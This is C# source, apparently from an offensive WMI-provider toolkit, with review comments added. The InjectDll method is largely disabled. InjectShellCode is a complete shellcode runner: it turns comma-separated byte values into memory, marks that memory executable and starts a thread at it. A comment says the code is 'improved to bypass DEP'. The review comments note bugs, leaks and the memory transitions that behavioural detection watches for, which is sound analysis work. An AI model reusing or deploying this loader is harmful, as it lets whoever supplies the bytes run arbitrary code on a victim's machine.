// Allocates a read/write region sized from the library name, switches it to
// PAGE_EXECUTE_READ and logs each step. The copy of the name into the region
// and the thread start are both commented out, so the live code only
// allocates, re-protects and reports.
//
// library: name or path of the library. Live code reads only its Length; the
//          ANSI copy made below is never consumed.
//
// NOTE(review): no return type is visible on this declaration - confirm
// whether it is a constructor of a class named InjectDll.
// NOTE(review): Unmanaged.* presumably wraps the Win32 calls of the same name
// acting on the calling process - verify against the Unmanaged class.
public InjectDll(string library)
{
    ////////////////////////////////////////////////////////////////////////////////
    IntPtr lpAddress = IntPtr.Zero;
    // NOTE(review): Marshal.SizeOf reports the marshaled size of char, which
    // need not equal the managed sizeof(char) - confirm the byte count matches
    // the ANSI string produced by StringToHGlobalAnsi below.
    UInt32 dwSize = (UInt32)((library.Length + 1) * Marshal.SizeOf(typeof(char)));
    WriteOutputNeutral("Attempting to allocate memory");
    IntPtr lpBaseAddress = Unmanaged.VirtualAlloc(lpAddress, dwSize, Unmanaged.MEM_COMMIT | Unmanaged.MEM_RESERVE, Unmanaged.PAGE_READWRITE);
    // The result is not compared with IntPtr.Zero, so a failed allocation is
    // still logged as a success.
    WriteOutputGood("Allocated " + dwSize + " at " + lpBaseAddress);

    ////////////////////////////////////////////////////////////////////////////////
    UInt32 lpNumberOfBytesWritten = 0; // never read in this method
    // Unmanaged copy of the string; no Marshal.FreeHGlobal call is visible, so
    // this buffer is leaked on every call.
    IntPtr libraryPtr = Marshal.StringToHGlobalAnsi(library);
    WriteOutputNeutral("Attempting to write process memory");
    //Marshal.Copy(libraryPtr, 0, lpBaseAddress, dwSize);
    // The copy above is disabled, so nothing is written to lpBaseAddress and
    // the message below reports a write that did not happen.
    WriteOutputGood("Wrote " + dwSize + " bytes");

    ////////////////////////////////////////////////////////////////////////////////
    UInt32 lpflOldProtect = 0;
    WriteOutputNeutral("Attempting to Alter Memory Protections to PAGE_EXECUTE_READ");
    // Private memory moving from PAGE_READWRITE to PAGE_EXECUTE_READ is the
    // transition that memory-protection telemetry is typically tuned to flag.
    Boolean virtualProtectExResult = Unmanaged.VirtualProtect(lpBaseAddress, dwSize, Unmanaged.PAGE_EXECUTE_READ, ref lpflOldProtect);
    if (virtualProtectExResult)
    {
        WriteOutputGood("Set Memory Protection to PAGE_EXECUTE_READ");
    }
    else
    {
        // Failure is only reported; execution continues past this point.
        WriteOutputBad("Memory Protection Operation Failed");
    }

    ////////////////////////////////////////////////////////////////////////////////
    // These locals feed only the commented-out CreateThread call below.
    IntPtr lpThreadAttributes = IntPtr.Zero;
    UInt32 dwStackSize = 0;
    IntPtr lpParameter = IntPtr.Zero;
    UInt32 dwCreationFlags = 0;
    UInt32 threadId = 0;
    WriteOutputNeutral("Attempting to start thread");
    // Disabled: loadLibraryAddr is not defined anywhere in this method, so the
    // call could not be re-enabled as written.
    //IntPtr hThread = Unmanaged.CreateThread(lpThreadAttributes, dwStackSize, loadLibraryAddr, lpBaseAddress, dwCreationFlags, ref threadId);
    //WriteOutputGood("Started Thread: " + hThread);

    ///////////////////////////////////////////////////////////////////////////////
    //Unmanaged.WaitForSingleObject(hThread, 0xFFFFFFFF);
    // The region at lpBaseAddress is not released before returning.
}
//Basis for function, improved to bypass DEP and to take string input
//https://github.com/subTee/EvilWMIProvider/blob/master/EvilWMIProvider/EvilWMIProvider.cs
//
// Parses a comma-separated list of byte values, copies the bytes into a newly
// allocated read/write region, switches the region to PAGE_EXECUTE_READ,
// starts a thread at its base address and blocks until that thread exits.
//
// shellCodeString: comma-delimited integers, one per byte. The bytes are
//                  executed as native code without validation, so whoever
//                  controls this string controls code execution in the
//                  hosting process.
//
// NOTE(review): no return type is visible on this declaration - confirm
// whether it is a constructor of a class named InjectShellCode.
// NOTE(review): Unmanaged.* presumably wraps the Win32 calls of the same name
// acting on the calling process - verify against the Unmanaged class.
public InjectShellCode(string shellCodeString)
{
    const char DELIMITER = ',';
    string[] shellCodeArray = shellCodeString.Split(DELIMITER);
    byte[] shellCodeBytes = new Byte[shellCodeArray.Length];
    for (int i = 0; i < shellCodeArray.Length; i++)
    {
        // Nothing here catches conversion failures: a malformed token, or a
        // value outside 0-255 (Convert.ToByte), propagates as an exception.
        int value = (int)new System.ComponentModel.Int32Converter().ConvertFromString(shellCodeArray[i]);
        shellCodeBytes[i] = Convert.ToByte(value);
    }

    ////////////////////////////////////////////////////////////////////////////////
    IntPtr lpAddress = IntPtr.Zero;
    UInt32 dwSize = (UInt32)shellCodeBytes.Length;
    // Uses MEM_COMMIT alone, whereas InjectDll passes MEM_COMMIT | MEM_RESERVE.
    // The result is not compared with IntPtr.Zero before it is used.
    IntPtr lpBaseAddress = Unmanaged.VirtualAlloc(lpAddress, dwSize, Unmanaged.MEM_COMMIT, Unmanaged.PAGE_READWRITE);
    WriteOutput("Allocating Space at Address " + lpBaseAddress);
    WriteOutput("Memory Protection Set to PAGE_READWRITE");

    ////////////////////////////////////////////////////////////////////////////////
    Marshal.Copy(shellCodeBytes, 0, lpBaseAddress, shellCodeBytes.Length);
    WriteOutput("Injected ShellCode at address " + lpBaseAddress);

    ////////////////////////////////////////////////////////////////////////////////
    UInt32 lpflOldProtect = 0;
    // The region is writable first and executable afterwards, never both. The
    // change from PAGE_READWRITE to PAGE_EXECUTE_READ on private memory,
    // followed by a thread starting inside that region, is the sequence that
    // behavioural detection looks for.
    // The result lands in 'test' and is never read, so the message below is
    // logged whether or not the protection change succeeded.
    Boolean test = Unmanaged.VirtualProtect(lpBaseAddress, dwSize, Unmanaged.PAGE_EXECUTE_READ, ref lpflOldProtect);
    WriteOutput("Altering Memory Protections to PAGE_EXECUTE_READ");

    ////////////////////////////////////////////////////////////////////////////////
    IntPtr lpThreadAttributes = IntPtr.Zero;
    UInt32 dwStackSize = 0;
    IntPtr lpParameter = IntPtr.Zero;
    UInt32 dwCreationFlags = 0;
    UInt32 threadId = 0;
    WriteOutput("Attempting to start thread");
    // The thread's start address is the base of the copied buffer. The handle
    // is not checked for failure and is never closed in this method.
    IntPtr hThread = Unmanaged.CreateThread(lpThreadAttributes, dwStackSize, lpBaseAddress, lpParameter, dwCreationFlags, ref threadId);
    WriteOutput("Started Thread: " + hThread);

    ////////////////////////////////////////////////////////////////////////////////
    // 0xFFFFFFFF is the INFINITE timeout: the caller blocks until the thread
    // exits. The region at lpBaseAddress is not released afterwards.
    Unmanaged.WaitForSingleObject(hThread, 0xFFFFFFFF);
}